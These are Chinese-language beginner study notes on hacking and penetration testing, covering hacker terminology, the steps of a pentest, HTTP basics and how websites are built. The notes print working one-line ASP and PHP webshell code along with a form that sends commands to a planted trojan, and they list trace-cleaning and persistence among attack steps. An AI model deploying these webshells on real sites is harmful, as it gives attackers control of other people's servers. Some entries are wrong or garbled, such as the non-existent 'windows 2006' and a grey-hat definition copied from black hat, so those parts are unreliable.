基础部分-科普

黑客

- Hacker音译出来的，做的不是恶意破坏，是技术人员

骇客

- 做坏事的人

红客

- 中国特色的技术人员

白帽子

- 专门研究从事网络安全行业的人

黑帽子

- 专门研究木马，操作系统，寻找漏洞，并且人为意志攻击网络或者计算机

灰帽子

- 专门研究木马，操作系统，寻找漏洞，并且人为意志攻击网络或者计算机

专业术语

1，脚本

-asp,php,jsp

2，html

- css,js,html

3，HTTP协议

- 网络传输的协议

4，CMS（B/S）

5，MD5

- 一种信息加密的方式

肉鸡

- 被黑客入侵并被长时间驻扎的计算机或者服务器

抓鸡

- 利用使用量大的程序的漏洞，使用自动化方式获取肉鸡的行为

Webshell

- 通过Web入侵的一种脚本工具，可以据此对网站服务进行一定程度的控制

漏洞

- 硬件，软件，协议等等的可利用的安全缺陷，可能被攻击者利用，对数据进行篡改，控制等。

一句话-木马

- 通过向服务端提交一句简短的代码，配合本地客户端实现webshell功能的木马
    <%eval request("pass")%>
    <%execute(request("pass"))%>
    request("pass")接受客户端提交的数据，pass为执行命令的参数值
    eval/execute 函数执行客户端命令的内容
- 如PHP的一句话木马
    - <?php eval($_POST[canshu]);?>
    - 下面的代码可以用POST的方式提交PHP语句，利用PHP脚本的各种函数，就可以实现执行系统命令，修改数据库，增删改查文件等等的各种功能
        - <form method=post action=http://木马地址>
            <textarea name=canshu>
                //这里写php代码
                phpinfo();
            </textarea>
            <input type=submit>
            </form>

提权

- 操作系统低权限的账户将自己提升为管理员权限使用的方法

后门

- 黑客为了对主机进行长期的控制，在机器上种植的一段程序或留下的一个“入口”

跳板

- 使用肉鸡IP来实施攻击其他目标，以便更好的隐藏自己的身份信息

旁站入侵

- 即同服务器下的网站入侵，入侵之后可以用通过提权跨目录等手段拿到目标网站的权限。常见的旁站查询工具有：webrobot，御剑，明小子和web在线查询等

C端入侵

- 即同C段下服务器入侵，如目标IP为192.168.1.253入侵192.168.1.*的任意一台机器，然后利用一些黑客工具嗅探获取在网络上传输的各种信息，常用的工具有：windows下有Cain，在unix环境下有sniffit，snoop，tcpdump，dsniff等等。

渗透测试

- 黑盒测试：在未授权的情况下，模拟黑客的攻击方法和思维方式，来评估计算机网络系统可能蔡遵的安全风险
- 黑盒测试不同于黑客入侵，并不等于黑站。黑盒测试考验的是综合的能力（OS,Datebase,Script,code,思路,社工）
- 思路与经验积累往往决定成败
- 三个臭皮匠赛过诸葛亮
- 白盒测试：相对黑盒测试，白盒测试基本是从内部发起
- 黑白盒的另一种说法，知道源代码和不知道源代码的渗透测试，这时，黑盒测试还是传统的渗透测试，而白盒测试就偏向于代码审计
- APT攻击：Advanced Persistent Threat，高级可持续性攻击，是指组织（特别是政府）或者小团体利用先进的攻击手段对特定目标进行长期持续性网络攻     击的攻击形式。
    1极强的隐蔽性
    2.潜伏期长，持续性强
    3.目标性强
- 渗透测试的特点
    充满挑战与刺激---不达目的不罢休
    思路与经验累积往往决定成败
    三个臭皮匠赛过诸葛亮

渗透测试的流程

渗透测试

-更全面地找出服务 的问题，更倾向于保护。

入侵

-不摔手段地（甚至是具有破坏性的）拿到权限。

明确目标 信息收集 漏洞探测 漏洞验证 信息分析 获取所需 信息整理 形成报告

明确目标

- 确定范围
- 确定规则
- 确定需求

信息采集

- 基础信息
- 系统信息
- 应用信息
- 版本信息
- 服务信息
- 人员信息
- 防护信息 

漏洞探测

- 系统漏洞
- WebServer漏洞
- Web应用漏洞
- 其他端口服务漏洞
- 通信安全

漏洞验证

- 自动化验证
- 手工验证
- 试验验证
- 登陆猜解
- 业务漏洞验证
- 公开资源的利用

信息分析

- 精准打击
- 绕过防御机制
- 定制攻击路径
- 绕过检测机制
- 攻击代码

获取所需

- 实施攻击
- 获取内部信息
- 进一步渗透
- 持续性存在
- 清理痕迹

信息整理

- 整理渗透工具
- 整理收集信息
- 整理漏洞信息

形成报告

- 按需整理
- 补充介绍
- 修补建议 

经验分享

- 息搜集是关键
- 做事不要太心急
- 多学习，多看源码
- 平时注意搜集Oday
- 思路很重要

学会安装虚拟机VMware和虚拟机安装各种系统

- windows
    - windows 2003
    - windows 2006
    - windows 7
    - windows xp
    - windows 10
- linux
    - ubuntu
    - centos
    - debian

常用的一些快捷键

- Win+R 运行
    - ncpa.cpl 快速打开网络适配器
    - cmd 快速打开命令窗口
    - ipconfig 快速查看网卡配置信息

网站篇

http讲解

http协议

-超文本传输协议
-（HТТP，HyperText Transfer Protocol）是互联网上应用最为广泛的一种网络协议。所有的WwW文件都必须遵守这个标准。设计HTTP最初的目的是为了提供一种发布和接收HTML页面的方法

http头讲解

- 200响应码
- date日期
- content-type类型
- Accept-Charset：浏览器可接受的字符集。
- Content-Length：表示请求消息正文的长度。
- Cookie：这是最重要的请求头信息之一
- http://www.mrgod.cn
- 例子
    -# curl -I www.baidu.com
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
    Connection: keep-alive
    Content-Length: 277
    Content-Type: text/html
    Date: Thu, 12 Dec 2019 03:13:59 GMT
    Etag: "575e1f5c-115"
    Last-Modified: Mon, 13 Jun 2016 02:50:04 GMT
    Pragma: no-cache
    Server: bfe/1.0.8.18

静态网站

- 静态网站是指全部由HTML（标准通用标记语言的子集）代码格式页面组成的网站所有的内容包含在网页文件中。网页上也可以出现各种视觉动态效果，如GIF动画FLASH动画、滚动字幕等，而网站主要是静态化的页面和代码组成，一般文件名均以htmhtml shtm等为后缀

动态网站

- 动态网站并不是指具有动画功能的网站，而是指网站内容可根据不同情况动态变更的网站，一股情况下动态网站通过数据库进行架构。动态网站除了要设计网页外，还要通过数据库和编程序来使网站具有更多自动的和高级的功能。动态网站体现在网页一般是以asp，jsp，php，aspx等结束，而静态网页一股是HTML（标准通用标记语言的子集）结尾，动态网站服务器空间配置要比静态的网页要求高，费用也相应的高，不过动态网页利于网站内容的更新，适合企业建站。动态是相对于静态网站而言。

网站搭建

- 1 Windows+iis+asp+access
- 2 windows+iis +asp +mssgl
- 1.Windows+asp小旋风+asp+access
- 1 windows+apmserv+php+mysql
- 2 windows+tomcat+ jsp +mysql
- 1 linux+apche+php+mysal